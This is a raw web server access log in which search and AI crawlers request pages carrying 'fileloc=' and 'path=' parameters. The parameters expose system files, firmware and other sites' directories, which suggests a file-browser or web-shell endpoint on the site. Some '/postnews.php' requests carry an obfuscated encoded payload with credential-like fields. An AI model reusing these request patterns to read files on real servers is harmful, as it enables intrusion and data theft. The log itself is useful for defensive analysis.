216.73.216.53 - - [03/Nov/2025:04:17:44 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp82%2Fbin%2Fphpize&path=%2F%2Fopt%2Fphp82%2Fbin HTTP/1.0" 200 17491 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:17:47 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgcreate&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:17:47 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723bs_wowlan.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 60939 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:17:49 +1000] "GET /1139680?path=//usr/etc HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:17:50 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723bs_bt.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 27593 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:15:00 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131303930302p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373330302q6135343633663331363637663336626139383264646531306133313961616236222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
81.167.26.57 - - [03/Nov/2025:04:17:52 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgdisplay&path=//sbin HTTP/1.0" 200 3198336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:17:53 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8821aefw_wowlan.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 47860 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.162.62 - - [03/Nov/2025:04:17:54 +1000] "GET /2439126144?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-content HTTP/1.0" 200 26562 "https://region-logist.ru/2439126144?shopdetail=2436250663" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [03/Nov/2025:04:17:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FCYPRESS_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 59611 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:17:57 +1000] "GET /1162784?path=//lib/rpm HTTP/1.0" 200 36419 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:17:58 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgexport&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:17:59 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FPALM_me.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 20969 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:02 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FHAWAII_mc2.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 58902 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:04 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgextend&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:18:03 +1000] "GET /1332240?path=//var/lock HTTP/1.0" 200 18028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:18:05 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723defw.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 62794 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:08 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8192cfw.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 42051 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:10 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgimport&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:11 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FOLAND_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 23159 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:18:12 +1000] "GET /1208560?path=//usr/src HTTP/1.0" 200 15327 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:18:14 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8192cufw.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 40806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:15:23 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131303932332p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373332332q6234626637346130653037366265653862616134343664663662333162323031222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
81.167.26.57 - - [03/Nov/2025:04:18:15 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgimportclone&path=//sbin HTTP/1.0" 200 3198340 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:17 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8192eu_wowlan.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 58396 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:20 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_rlc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 23836 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:22 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgmerge&path=//sbin HTTP/1.0" 200 3198334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:18:22 +1000] "GET /1174480?fileloc=//usr/bin/gcov&path=//usr/bin HTTP/1.0" 200 513595 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:18:23 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Frtlwifi%2Frtl8723fw_B.bin&path=%2F%2Flib%2Ffirmware%2Frtlwifi HTTP/1.0" 200 53866 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:26 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fgettext%2FABOUT-NLS&path=%2F%2Fusr%2Fshare%2Fgettext HTTP/1.0" 200 107218 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:27 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgmknodes&path=//sbin HTTP/1.0" 200 3198336 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:29 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2FGeoIP%2FGeoIPv6.dat&path=%2F%2Fusr%2Fshare%2FGeoIP HTTP/1.0" 200 4250543 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:18:32 +1000] "GET /1174480?fileloc=//usr/bin/grub2-render-label&path=//usr/bin HTTP/1.0" 200 1458600 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:18:34 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgreduce&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:38 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fopt%2Fphp70%2FPEAR%2FREST.php&path=%2F%2Fopt%2Fphp70%2FPEAR HTTP/1.0" 200 30594 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:39 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgremove&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
212.16.195.25 - - [03/Nov/2025:04:15:46 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131303934362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373334362q6131316365363636333137313130623437303635303839393935666663306663222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:18:41 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_ce.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 22096 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:44 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FSUMO2_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 18778 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:45 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgrename&path=//sbin HTTP/1.0" 200 3198335 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:18:45 +1000] "GET /1174640?path=//lib/kbd HTTP/1.0" 200 17991 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:18:47 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FHAWAII_sdma.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 18391 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:50 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgs&path=//sbin HTTP/1.0" 200 3198330 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:50 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fauthconfig%2Fauthconfig-tui.pyo&path=%2F%2Fusr%2Fshare%2Fauthconfig HTTP/1.0" 200 56187 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:18:54 +1000] "GET /1174480?fileloc=//usr/bin/gio&path=//usr/bin HTTP/1.0" 200 119824 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:18:54 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fmyspell%2Fen_US.aff&path=%2F%2Fusr%2Fshare%2Fmyspell HTTP/1.0" 200 15501 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:18:56 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgscan&path=//sbin HTTP/1.0" 200 3198333 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:18:56 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_mc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 57194 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:18:59 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Fiptables HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:01 +1000] "GET /1262832?path=//var/lock HTTP/1.0" 200 18028 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:19:01 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vgsplit&path=//sbin HTTP/1.0" 200 3198334 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:02 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FOLAND_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 97310 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
212.16.195.25 - - [03/Nov/2025:04:16:11 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131303937312p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373337312q6362633333396332653936666333336636386131636234336433373731323431222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:19:05 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Fbk%2Fefi%2Feficenter.ru%2Fcontact.php&path=%2Fhome%2Fbk%2Fefi%2Feficenter.ru HTTP/1.0" 200 13717 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:08 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vigr&path=//sbin HTTP/1.0" 200 102664 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:08 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FOLAND_mc2.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 57693 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:10 +1000] "GET /1478368?path=//var/lib/net-snmp HTTP/1.0" 200 15473 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
216.73.216.53 - - [03/Nov/2025:04:19:12 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Frsyslog.d HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:12 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vipw&path=//sbin HTTP/1.0" 200 102664 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:14 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fauthconfig%2Fauthinfo.pyo&path=%2F%2Fusr%2Fshare%2Fauthconfig HTTP/1.0" 200 134931 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:17 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/virt-what&path=//sbin HTTP/1.0" 200 25947 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:17 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 24377 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:19 +1000] "GET /1075104?path=//var/mail HTTP/1.0" 200 95631 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:19:21 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/visudo&path=//sbin HTTP/1.0" 200 323368 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:20 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2FNetworkManager HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.53 - - [03/Nov/2025:04:19:23 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?path=%2Fhome%2Fbk%2Fefi%2Feficenter.ru%2Fjs HTTP/1.0" 200 123644 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
114.119.140.64 - - [03/Nov/2025:04:19:24 +1000] "GET /2439126144?path=/home/region-gk.ru/data/www/new.region-gk.ru/wp-admin HTTP/1.0" 200 175894 "https://region-logist.ru/2439126144?shopdetail=2436250663" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.216.53 - - [03/Nov/2025:04:19:26 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2FPALM_pfp.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 18802 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:26 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vmcore-dmesg&path=//sbin HTTP/1.0" 200 37605 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
74.7.227.14 - - [03/Nov/2025:04:19:28 +1000] "GET /1169392?path=//var/nis HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
212.16.195.25 - - [03/Nov/2025:04:16:36 +1000] "GET /postnews.php?ARRAY=7o2230223n313736323131303939362p2231223n22687474703n5p2s5p2s7n7335353876313373752r6772616469736q2r6265617574795p2s3s6p633q7068705s636s64655s6n6326743q313736323130373339362q3931363430363636383733373165336232343235326261333265643566316561222p2232223n223039363837633835373466313934666439643439343139613861313463323065222p2233223n223938383633363430623431383065623061613663653330623236356137346638222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231322q34352q35362q36372q37352q38392q3234227q HTTP/1.0" 200 52 "-" "-"
216.73.216.53 - - [03/Nov/2025:04:19:29 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2Fhome%2Ftemp%2Ftopquartz.ru%2Fwp-includes%2Ffonts%2Fdashicons.eot&path=%2Fhome%2Ftemp%2Ftopquartz.ru%2Fwp-includes%2Ffonts HTTP/1.0" 200 74378 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:31 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/vpddecode&path=//sbin HTTP/1.0" 200 32477 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:32 +1000] "GET /letters/strojinvest?path=%2F%2Fetc%2Fsystemd HTTP/1.0" 302 - "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.244.168.117 - - [03/Nov/2025:04:19:34 +1000] "GET /1440771808?fileloc=/home/region-gk.ru/data/www/new.region-gk.ru/delpaths.php&path=/home/region-gk.ru/data/www/new.region-gk.ru HTTP/1.0" 200 12802 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
216.73.216.53 - - [03/Nov/2025:04:19:35 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Flib%2Ffirmware%2Fradeon%2Fpitcairn_smc.bin&path=%2F%2Flib%2Ffirmware%2Fradeon HTTP/1.0" 200 99938 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
74.7.227.14 - - [03/Nov/2025:04:19:36 +1000] "GET /1227360?path=//run/lvm HTTP/1.0" 200 12719 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.2; +https://openai.com/gptbot)"
81.167.26.57 - - [03/Nov/2025:04:19:36 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/weak-modules&path=//sbin HTTP/1.0" 200 48408 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
216.73.216.53 - - [03/Nov/2025:04:19:38 +1000] "GET /catalog/avtokrany/avtomobilnyj-kran-zoomlion-ztc600v-60-tonn?fileloc=%2F%2Fusr%2Fshare%2Fmyspell%2Fen_US.dic&path=%2F%2Fusr%2Fshare%2Fmyspell HTTP/1.0" 200 548452 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
81.167.26.57 - - [03/Nov/2025:04:19:41 +1000] "GET /news/novost-test-%E2%84%96-2/?fileloc=//sbin/wipefs&path=//sbin HTTP/1.0" 200 51883 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
